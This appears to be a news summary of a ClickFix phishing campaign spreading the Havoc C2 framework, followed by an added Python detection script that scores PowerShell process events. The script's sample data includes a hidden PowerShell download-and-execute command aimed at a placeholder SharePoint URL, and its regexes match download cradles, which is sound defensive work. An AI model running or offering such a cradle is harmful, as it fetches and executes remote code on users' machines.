BleepingComputer reports that malicious actors have been distributing the Havoc post-exploitation command-and-control framework through a new ClickFix phishing campaign. According to a report from Fortinet FortiGuard Labs, attacks begin with phishing emails purporting to be restricted notices that can only be read by opening an HTML attachment. Opening the attachment triggers a bogus 0x8004de86 error with a "How to fix" button; clicking it copies a PowerShell command to the clipboard and then displays instructions for running that command, which in turn fetches another PowerShell script from a SharePoint server. That script terminates if it finds itself in a sandbox environment; otherwise it makes Windows Registry alterations leading to the eventual download of Havoc from the same SharePoint server. Aside from allowing malicious traffic to blend into cloud services, Havoc also leverages Microsoft Graph's SharePoint APIs to deliver and receive commands, Fortinet researchers noted.
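The chain above leaves a recognisable footprint on the endpoint: a PowerShell process started by the user pasting a clipboard command, carrying stealth flags, a download cradle, and a SharePoint-hosted script. The following is an added detection example, not code from the article or from Fortinet; it assumes process-creation events have already been normalised into dictionaries with `parent`, `image` and `cmdline` keys (for example from Sysmon Event ID 1), and that ClickFix victims paste the command into the Run dialog, so the parent process is `explorer.exe`. The sample events are constructed and the SharePoint URL is a placeholder.

```python
import re

# Constructed sample process-creation events (not from the article).
# Event 0 mimics the ClickFix pattern; events 1 and 2 are benign noise.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -nop -c "iex (iwr '
                'https://EXAMPLE-tenant.sharepoint.com/sites/x/stage.ps1)"'},
    {"parent": "code.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\build.ps1"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell Get-Date"},
]

# Heuristics for each stage of the lure described in the article.
HIDDEN_FLAGS = re.compile(
    r"-(w|windowstyle)\s*hidden|-nop\b|-noprofile|-(ep|executionpolicy)\s*bypass",
    re.I)
DOWNLOAD_CRADLE = re.compile(
    r"\biwr\b|invoke-webrequest|downloadstring|invoke-expression|\biex\b", re.I)
SHAREPOINT_HOST = re.compile(r"https?://[\w.-]*sharepoint\.com/", re.I)


def score_event(ev):
    """Return (score, reasons) for one process-creation event.

    Each matched indicator adds one point; the reasons list explains
    the verdict so an analyst can triage the alert.
    """
    reasons = []
    if ev["image"].lower() == "powershell.exe" and ev["parent"].lower() == "explorer.exe":
        # Assumption: pasted Run-dialog commands are parented by explorer.exe
        reasons.append("powershell spawned by explorer.exe (pasted command)")
    if HIDDEN_FLAGS.search(ev["cmdline"]):
        reasons.append("hidden-window / no-profile / bypass flags")
    if DOWNLOAD_CRADLE.search(ev["cmdline"]):
        reasons.append("in-memory download cradle")
    if SHAREPOINT_HOST.search(ev["cmdline"]):
        reasons.append("second-stage script hosted on SharePoint")
    return len(reasons), reasons


def flag_clickfix(events, threshold=3):
    """Return [(event, reasons)] for events scoring at or above threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, reasons))
    return hits
```

A single indicator (PowerShell under explorer.exe) is common in normal use, so the threshold requires several to coincide before raising an alert.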
Phishing, Malware, Threat Intelligence, Email security
Havoc C2 framework spread in novel ClickFix phishing campaign
